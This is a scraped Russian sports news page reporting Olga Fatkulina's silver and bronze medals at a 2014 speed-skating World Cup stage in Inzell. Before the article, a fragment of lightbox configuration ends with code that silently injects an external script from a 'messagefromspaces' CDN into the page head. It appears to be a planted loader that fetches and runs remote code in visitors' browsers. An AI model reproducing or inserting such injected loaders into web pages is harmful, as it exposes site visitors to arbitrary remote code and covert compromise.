, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Ольга Фаткулина завоевала две медали на этапе Кубка Мира в Германии

Челябинская конькобежка успешно выступила на очередном этапе Кубка Мира, который проходил в немецком Инцеле. В активе нашей спортсменки серебряная медаль в забеге на 500 метров и бронза на дистанции 1000 метров. В обоих забегах Фаткулина была лучшей из представительниц Европы.

Ольга взяла серебро на дистанции 500 метров - той самой, на которой она завоевала свою олимпийскую медаль. В Инцеле быстрее Фаткулиной была только американка Хизер Ричардсон. Она же выиграла и на дистанции 1000 метров. Ольга Фаткулина завоевала бронзу в этом забеге, опередив представительницу Голландии Маргарет Бур. Напомним, именно ей наша землячка проиграла на Олимпиаде в забеге на эту же дистанцию. Теперь же Ольга взяла реванш и опередила голландку на 6 сотых секунды.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
11:47 - 11 марта 2014
|
автор: U-RSS
|
(424)
|
(0)

Комментарии (0)

Я человек
Я бот